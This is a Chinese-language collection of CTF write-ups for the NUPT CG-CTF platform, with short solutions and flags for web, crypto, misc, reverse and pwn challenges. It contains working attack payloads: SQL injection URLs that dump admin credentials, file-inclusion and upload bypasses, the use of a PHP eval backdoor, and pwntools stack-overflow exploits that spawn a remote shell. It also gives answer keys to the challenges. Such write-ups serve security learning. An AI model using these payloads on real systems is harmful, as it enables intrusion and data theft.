CG(南郵)CTF:https://cgctf.nuptsast.com/login
web
簽到題
查看源碼
nctf{flag_admiaanaaaaaaaaaaa}
md5 collision
php弱類型
http://chinalover.sinaapp.com/web19/?a=aabg7XSs
nctf{md5_collision_is_easy}
簽到2
審查元素修改
nctf{follow_me_to_exploit}
這題不是WEB
下載圖片用記事本打開最後有flag
nctf{photo_can_also_hid3_msg}
層層遞進
查看源碼,點擊src="SO.html"繼續點擊src="S0.html" 繼續點擊src="SO.htm、"src="S0.htm"、rc="404.html"看註釋中間有flag
nctf{this_is_a_fl4g}
AAencode
用瀏覽器更改unicode編碼查看,輸入控制檯
nctf{javascript_aaencode}
單身二十年
查看源代碼頁面點擊
a href="./search_key.php"
nctf{yougotit_script_now}
php decode
源代碼eval改爲printf直接打印結果
或者python寫腳本:
import base64
import zlib
a = "+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="
def gzinflate(self):
compressed_data = base64.b64decode(self)
return zlib.decompress(compressed_data, -15)
a = gzinflate(a)
print a
b = ""
for i in range(len(a)):
b += chr(ord(a[i:i+1])-1)
print b
nctf{gzip_base64_hhhhhh}
文件包含
用php僞協議讀index.php
再base64解碼得到
flag:nctf{edulcni_elif_lacol_si_siht}
單身一百年也沒用
點鏈接bs抓包,看返回包頭部
nctf{this_is_302_redirect}
Download~!
訪問http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw下載download.php
打開發現hereiskey.php同理下載hereiskey.php
nctf{download_any_file_666}
COOKIE
bs抓包cookie改爲1
flag:nctf{cookie_is_different_from_session}
MYSQL
既然限制了直接輸入1024,說明要查的id很有可能就是1024.intval()將變量轉成整數類型,默認是轉爲10進制.那麼我們輸入1024.1就行了.intval()會把1024.1變爲1024,這樣查的時候id=1024,而if ($_GET[id]==1024)的時候1024.1!=1024
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1
nctf{query_in_mysql}
GBK Injection
寬字節注入
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2--+
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=0%df' union select 1,(SELECT+GROUP_CONCAT(flag+SEPARATOR+0x3c62723e)+FROM+gbksqli)--+
nctf{gbk_3sqli}
ctf4表裏是flag{this_is_sqli_flag}
/x00
代碼審計
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%00%23biubiubiu3
或者
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf[]=
Flag: flag:nctf{use_00_to_jieduan}
bypass again
php弱類型
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2
Flag: nctf{php_is_so_cool}
變量覆蓋
http://chinalover.sinaapp.com/web18/
POST數據:pass=1&thepassword_123=1
nctf{bian_liang_fu_gai!}
PHP是世界上最好的語言
url二次編碼
id=%25%36%38%25%36%31%25%36%33%25%36%62%25%34%34%25%34%61
nctf{php_is_best_language}
僞裝者
bs抓包頭部加X-Forwarded-For:127.0.0.1但不行
需要加client-ip:127.0.0.1
nctf{happy_http_headers}
Header
bs抓包看返回頭部
nctf{tips_often_hide_here}
上傳繞過
bs抓包改
/uploads/a.php%00(%00url解碼)
flag:nctf{welcome_to_hacks_world}
SQL注入1
代碼審計,補全
admin')#
flag:nctf{ni_ye_hui_sql?}
pass check
http://chinalover.sinaapp.com/web21/
POST內容:pass[]=
flag:nctf{strcmp_is_n0t_3afe}
起名字真難
十六進制和十進制轉換比較
http://chinalover.sinaapp.com/web12/index.php?key=0xCCCCCCCCC
The flag is:nctf{follow_your_dream}
密碼重置
bs抓包頭部user1參數改爲admin的編碼YWRtaW4=
POST /web13/index.php?user1=YWRtaW4= HTTP/1.1
POST內容:
user=admin&newpass=123456&vcode=1234
flag is:nctf{reset_password_often_have_vuln}
php 反序列化(暫時無法做)
Congratulation! Here is my secret: thisisnctfsecret
SQL Injection
http://chinalover.sinaapp.com/web15/index.php?username=admin\&password=or 1 %23
flag:nctf{sql_injection_is_interesting}
綜合題
御劍掃描到.bash_history打開提示zip -r flagbak.zip ./*
下載flagbak.zip打開
flag is:nctf{bash_history_means_what}
system(暫時無法做)
SQL注入2
bs抓包改user=' union select md5(1)#&pass=1
Logged in! Key: ntcf{union_select_is_wtf}
綜合題2
點本CMS說明發現地址疑似文件包含
http://cms.nuptzj.cn/about.php?file=index.php果然顯示源碼
依次將about.php,config.php,index.php,passencode.php,say.php,so.php文件下載下來
查看about.php由此文件可以猜到後臺入口爲/loginxlcteam,但沒有密碼
查看so.php源碼,這個就是當時搜索的php
驚奇的發現裏面包含了antiinject.php這個應該就是防止SQL注入的文件了,下載下來
文件過濾了敏感的單詞,但是雙重繞過就好了,過濾了空格,可以用/**/來繞過
先看一下搜索的源碼
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
這裏的$id沒有用''包裹,所以直接注入就好
bs抓包,根據so.php改頭部User-Agent: Xlcteam Browser,發送post數據先看一下回顯
soid=0/**/UNunionION/**/SELselectECT/**/1,2,3,4
發現共四個參數,顯示的是2,3
因爲之前已經瞭解到了表的結構,所以直接注入
soid=0/**/UNunionION/**/SELselectECT/**/1,usernam=e,userpas=s,4/**/fro=m/**/admi=n
得到admin的password
102 117 99 107 114 117 110 116 117
參照加密函數passencode.php,可以還原出密碼。password是ASCII碼存儲的,所以解碼得到admin的密碼
fuckruntu
登錄/loginxlcteam後臺提示xlcteam.php有一句話木馬,我們先把源碼下載下來
<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>
三個參數的數組回調後門
後門的使用
http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
POST數據:wtf=print_r(scandir("."));
顯示
Array ( [0] => . [1] => .. [2] => about.php [3] => antiinject.php [4] => antixss.php [5] => config.php [6] => index.php [7] => list.php [8] => loginxlcteam [9] => passencode.php [10] => preview.php [11] => say.php [12] => sm.txt [13] => so.php [14] => xlcteam.php [15] => 鎭枩浣犺幏寰梖lag2.txt )
最後一個亂碼,更改網頁編碼爲unicode,顯示爲 恭喜你獲得flag2.txt
構造http://cms.nuptzj.cn/about.php?file=恭喜你獲得flag2.txt
flag:nctf{you_are_s0_g00d_hacker}
密碼重置2
提示有vi編輯器異常退出的備份文件
http://nctf.nuptzj.cn/web14/.submit.php.swp
代碼審計令token爲0000000000就行了
bs抓包改GET /web14/submit.php?emailAddress=admin%40nuptzj.cn&token=0000000000 HTTP/1.1
flag:nctf{thanks_to_cumt_bxs}
file_get_contents
查看源碼代碼審計file_get_contents函數將整個文件讀入一個字符串
直接用php僞協議上傳file就行了
http://chinalover.sinaapp.com/web23/?file=php://input
POST數據:meizijiu
變量覆蓋
這道題還涉及了$$變量覆蓋。$$這種寫法稱爲可變變量,一個可變變量獲取了一個普通變量的值,作爲這個可變變量的變量名。我們傳入變量?name=meizijiu233,通過foreach()函數,進行變量賦值$key=name,$value=meizijiu233,然後語句$$key=$value,即$$key=$name=meizijiu233
http://chinalover.sinaapp.com/web24/?name=meizijiu233
nctf{AD3FBD8D5928693CA499347C91570AE6}
注意!!
flag{zhaowomen}
HateIT
Anonymous
Crypto
easy!
base64解碼
nctf{this_is_base64_encode}
Keyboard
看鍵盤按字符寫出字母
nctf{areuhack}
異性相吸
python2腳本
#coding=utf-8
encrypted=[]
with open("./密文.txt".decode('utf-8')) as f:
while True:
c = f.read(1)
if not c:
break
encrypted.append(c)
plain=[]
with open("./明文.txt".decode('utf-8')) as f:
while True:
c = f.read(1)
if not c:
break
plain.append(c)
flag=""
for i in range(len(encrypted)):
flag+=chr(ord(encrypted[i])^ord(plain[i]))
print(flag)
nctf{xor_xor_xor_biubiubiu}
Wiener Wiener Chicken Dinner
RSA wiener attack
用網上的python腳本解密
import math
def continued_fractions_expansion(numerator,denominator):#(e,N)
result=[]
divident=numerator%denominator
quotient=numerator/denominator
result.append(quotient)
while divident!=0:
numerator=numerator-quotient*denominator
tmp=denominator
denominator=numerator
numerator=tmp
divident=numerator%denominator
quotient=numerator/denominator
result.append(quotient)
return result
def convergents(expansion):
convergents=[(expansion[0],1)]
for i in range(1,len(expansion)):
numerator=1
denominator=expansion[i]
for j in range(i-1,-1,-1):
numerator+=expansion[j]*denominator
if j==0:
break
tmp=denominator
denominator=numerator
numerator=tmp
convergents.append((numerator,denominator))#(k,d)
return convergents
def newtonSqrt(n):
approx = n/2
better = (approx + n/approx)/2
while better != approx:
approx = better
better = (approx + n/approx)/2
return approx
def wiener_attack(cons,e,N):
for cs in cons:
k,d=cs
if k==0:
continue
phi_N=(e*d-1)/k
#x**2-((N-phi_N)+1)*x+N=0
a=1
b=-((N-phi_N)+1)
c=N
delta = b*b - 4*a*c
if delta<=0:
continue
x1= (newtonSqrt(delta)-b)/(2*a)
x2=-(newtonSqrt(delta)+b)/(2*a)
if x1*x2==N:
return [x1,x2,k,d]
N=1063045321283844468344531168992778520651192162100948533991539097447031440090068191835838938460807260866872379834796862916118785271062209281267667069640000501698142693389209275376843382863579650119977059768375028586326490055087394631528241983631462471709913758728591459476799115050977493979613545056736162868049L
e=837165022918376318972691589160491375229372195625940137121740685432530132860541010174727630660292946071507342455170833392895060048564125597915757582027572284342507277083636059558106672685400173531425920294781499112027917632497954958437660357575400222692979844873372105801998210845285775146263117399191185379347L
expansion=continued_fractions_expansion(e,N)
cons=convergents(expansion)
p,q,k,d=wiener_attack(cons,e,N)
print p
print q
print k
print d
解出d:
57899763801722261062891290503559835904571946557258761154422546104824094670843
帶入原腳本
#coding:utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import base64
from Crypto import Random
random_generator=Random.new().read
# flag=raw_input('flag:')
key=RSA.construct((1063045321283844468344531168992778520651192162100948533991539097447031440090068191835838938460807260866872379834796862916118785271062209281267667069640000501698142693389209275376843382863579650119977059768375028586326490055087394631528241983631462471709913758728591459476799115050977493979613545056736162868049L, 837165022918376318972691589160491375229372195625940137121740685432530132860541010174727630660292946071507342455170833392895060048564125597915757582027572284342507277083636059558106672685400173531425920294781499112027917632497954958437660357575400222692979844873372105801998210845285775146263117399191185379347L,57899763801722261062891290503559835904571946557258761154422546104824094670843))
cipher = Cipher_pkcs1_v1_5.new(key)
# cipher_text = base64.b64encode(cipher.encrypt(flag))
# print cipher_text
# cipher_text = 'AGgt1h6dudnkeoCr7SFclkYYsYa65KZ8V29bbgbf+BDyjnyx5stCYjcyktat73aHs2EOaMgwGUwj3HwPTvT+T5LHIxM4uTnAgWOui4dnb7vF7QizN0ShY2O1h26CgLnf5I0vQWbY7WCC7kA/orNW7F5yxZiKRAawacS2M5ghP4/Q'
cipher_text = 'AGgt1h6dudnkeoCr7SFclkYYsYa65KZ8V29bbgbf+BDyjnyx5stCYjcyktat73aHs2EOaMgwGUwj3HwPTvT+T5LHIxM4uTnAgWOui4dnb7vF7QizN0ShY2O1h26CgLnf5I0vQWbY7WCC7kA/orNW7F5yxZiKRAawacS2M5ghP4/Q'
text = cipher.decrypt(base64.b64decode(cipher_text), random_generator)
print text
運行得到flag:
flag{nell_anima_ritrovo_la_speranza_che_nel_corpo_stanco_ormai}
Baby RSA
msieve分解:
msieve153.exe 0x291733BAB061EF9C599139CB3E40A5C762B6F448FFFFFFFFFFFFFF -v
獲得
p1=1578173871764844869716052171
p2=10710927547195113973175047066215146269
已知p1,p2,n,e,求d,並且解密獲得flag:
python腳本:
import gmpy2
p1=1578173871764844869716052171
p2=10710927547195113973175047066215146269
n=0x291733BAB061EF9C599139CB3E40A5C762B6F448FFFFFFFFFFFFFF
e=0x10001
phi_n=(p1-1)*(p2-1)
d=gmpy2.invert(e,phi_n)
print hex(d)
c=0x237200C0F72B97DB55BA37C7AACBB61A26A0CB47D294726259C4DF
m=pow(c,d,n)
m_hex=hex(m)[2:]
m_str = str(bytearray.fromhex(m_hex))
print m_str
簡單的方法:
rsa-tool 2 by te! 寫入數據直接獲得答案
得出flag{Acdxvf5vD_15_W7f}
Classical
密文
nk gqsanez h yhxe ulj dklapdn e xhoaeu loylpneawyiyw
題目告訴是古典密碼
#!/usr/bin/python
# -*- coding: UTF-8 -*-
a='nk gqsanez h yhxe ulj dklapdn e xhoaeu loylpneawyiyw'
import string
lowercase = string.ascii_lowercase
def substitution(text, key_table):
text = text.lower()
result = ''
for l in text:
i = lowercase.find(l)
if i < 0:
result += l
else:
result += key_table[i]
return result
def caesar_cypher_encrypt(text, shift):
key_table = lowercase[shift:] + lowercase[:shift]
return substitution(text, key_table)
def caesar_cypher_decrypt(text, shift):
return caesar_cypher_encrypt(text, -shift)
for i in range(0,25):
print caesar_cypher_decrypt(a,i)
RSA EASY
Misc
丘比龍De女神
將後綴改爲zip,無法打開
先嚐試簡單的 binwalk,有個不完整的zip,拖進010editor查看,找到nvshen .jpg,上面有個love,做到這卡住了,搜題解,將love改爲PK,即504B0304,爲zip的文件頭,504B0506爲zip的文件尾,單獨把zip保存,得到壓縮包,love爲密碼。
zip文件頭504B0304,文件尾504B0506。
md5校驗文件得到flag
flag{a6caad3aaafa11b6d5ed583bef4d8a54}
Reverse
Hello,RE!
ida打開按a轉換
如果從左到右那麼連起來就是galfleW{emoc_oT_W_ERdlro}!
我們基本看不出什麼
不過如果我們反着看的話
就得到了flag
python腳本:
v5 = 'galf';
v6 = 'leW{';
v7 = 'emoc';
v8 = '_oT_';
v9 = 'W_ER';
v10 = 'dlro';
v11 = '}!';
print v5[::-1]+v6[::-1]+v7[::-1]+v8[::-1]+v9[::-1]+v10[::-1]+v11[::-1]
flag{Welcome_To_RE_World!}
ReadAsm2
下載分析源碼:
00000000004004e6<func>:;4004e6一列表示該指令對應的虛擬內存地址 55一列爲該指令對應的計算機指令
4004e6:55push rbp ;入棧,將寄存器的值壓入調用 bp棧中
4004e7:4889 e5 mov rbp,rsp;建立新棧幀,別掉函數棧幀棧底地址放入寄存器
4004ea:48897d e8 movQWORDPTR[rbp-0x18],rdi;對應main中input[]這時i=0 //[rbp-0x18] = input[0]
4004ee:8975 e4 movDWORDPTR[rbp-0x1c],esi;放入28 //[rbp-0x1c] = 28
4004f1: c745 fc 01000000movDWORDPTR[rbp-0x4],0x1;首先將0x1賦值給[rbp-0x4] //i = 1
4004f8: eb28jmp400522<func+0x3c>;接着跳轉到400522的位置 //for(i=1;i<=28;i++) 下面以第一次過程爲例
4004fa:8b45 fc moveax,DWORDPTR[rbp-0x4];將[rbp-0x4]的值賦給eax寄存器 //即令eax=i =1
4004fd:4863 d0 movsxd rdx,eax;將eax的值帶符號擴展,並傳送至rdx中 //即令rdx=eax =i =1
400500:488b45 e8 mov rax,QWORDPTR[rbp-0x18];將rax的值給input[0] //即令rax = input[0] =[rbp-0x18]
400504:4801 d0 add rax,rdx;將rdx的值加上rax再賦值給rax //即 rax=input[1] =i+input[0] =rdx+rax
400507:8b55 fc movedx,DWORDPTR[rbp-0x4];將[rbp-0x4]的值給edx //即令edx=i =1
40050a:4863 ca movsxd rcx,edx;將edx的值帶符號擴展,並傳送至rcx中 //即令rcx=i =1
40050d:488b55 e8 mov rdx,QWORDPTR[rbp-0x18];將[rbp-0x18]的值給rdx //即令rdx=[rbp-0x18] =input[0]
400511:4801 ca add rdx,rcx;將rcx的值加上rdx再賦值給rdx //即i++ rdx=input[1]
400514:0f b6 0amovzxecx,BYTEPTR[rdx];將rdx無符號擴展,並傳送至ecx //即ecx=chr(rdx) =chr(input[0])
400517:8b55 fc movedx,DWORDPTR[rbp-0x4];edx = [rbp-0x4] //即edx=i =1
40051a:31 ca xoredx,ecx;將edx與ecx異或 //i^input[0]
40051c:8810movBYTEPTR[rax],dl;rax = dl
40051e:8345 fc 01addDWORDPTR[rbp-0x4],0x1;[rbp-0x4]++ //i++
400522:8b45 fc moveax,DWORDPTR[rbp-0x4];將[rbp-0x4]的值賦給eax寄存器 //eax = i
400525:3b45 e4 cmpeax,DWORDPTR[rbp-0x1c];將[rbp-0x1c]中的值與eax值比較第一次就是28
400528:7e d0 jle4004fa<func+0x14>;如果<=那麼就跳到4004fa //if eax即i <=28跳到4004fa繼續循環
40052a:90nop;空指令
40052b:5dpop rbp ;出棧
40052c: c3ret;ret相當於return
————————————————
寫python腳本解:
input = [0x67,0x6e,0x62,0x63,0x7e,0x74, 0x62, 0x69, 0x6d, 0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66 , 0x1c]
flag = ""
for i in range(1,28):
flag = flag + chr(input[i-1]^ i)
print flag
得到flag
flag{read_asm_is_the_basic}
Pwn
When did you born?
# -*- coding:utf-8 -*-
from pwn import *
p = remote("ctf.acdxvfsvd.net",1926)
payload = "a"*8+p64(1926)
p.recvuntil("What's Your Birth?")
p.sendline("1927")
p.recvuntil("What's Your Name?")
p.sendline(payload)
p.interactive()
flag{gets_is_dangerous_+1s}
Stack Overflow
# -*- coding:utf-8 -*-
from pwn import *
p=remote('182.254.217.142',10001)
#create '/bin/sh' in bss
p.recvuntil('your choice:\n')
p.sendline('1')
payload1='A'*40+p32(0x80)+'/bin/sh' #exploit the bss
p.recvuntil('you can leave some message here:\n')
p.sendline(payload1)
elf=ELF('./cgpwna')
sysadr=elf.symbols['system'] #find the adr of system
payload2='A'*(0x30+0x4)+p32(sysadr)+p32(0xDEADBEEF)+p32(0x0804A0AD)
#use system('/bin/sh') and rand return address
p.recvuntil('your name please:\n')
p.sendline(payload2)
p.interactive()
flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}